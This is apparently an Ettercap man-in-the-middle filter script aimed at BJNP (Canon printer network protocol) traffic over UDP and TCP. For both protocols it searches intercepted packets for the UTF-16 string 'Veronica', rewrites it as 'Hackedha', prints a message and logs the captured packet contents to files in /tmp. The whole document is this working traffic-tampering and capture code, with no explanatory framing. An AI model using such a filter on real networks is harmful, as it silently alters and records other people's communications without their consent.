if (ip.proto == UDP) {
	if (search(DECODED.data, "BJNP")) {
		# Look's for "Veronica" in header and replaces with "HackedHa"
		if (search(DECODED.data, "\x56\x00\x65\x00\x72\x00\x6f\x00\x6e\x00\x69\x00\x63\x00\x61")) {
			replace("\x56\x00\x65\x00\x72\x00\x6f\x00\x6e\x00\x69\x00\x63\x00\x61","\x48\x00\x61\x00\x63\x00\x6b\x00\x65\x00\x64\x00\x68\x00\x61");
			msg("found Veronica UDP!\n");
			log(DECODED.data, "/tmp/etterlogFilePineDECODED.log");
			log(DATA.data, "/tmp/etterlogFilePine.log");
		}
		log(DATA.data, "/tmp/NameUDP.log");
		msg("found BJNP UDP");
	}
}

if (ip.proto == TCP) {
	if (search(DECODED.data, "BJNP")) {	
		# Look's for "Veronica" in header and replaces with "HackedHa"
		if (search(DECODED.data, "\x56\x00\x65\x00\x72\x00\x6f\x00\x6e\x00\x69\x00\x63\x00\x61")) {
			replace("\x56\x00\x65\x00\x72\x00\x6f\x00\x6e\x00\x69\x00\x63\x00\x61","\x48\x00\x61\x00\x63\x00\x6b\x00\x65\x00\x64\x00\x68\x00\x61");
			msg("found Veronica TCP!\n");
			log(DECODED.data, "/tmp/etterlogFilePineTCPDECODED.log");
			log(DATA.data, "/tmp/etterlogFilePineTCP.log");
		}
		log(DATA.data, "/tmp/NameTCP.log");
		#msg("found BJNP TCP");
	}
}
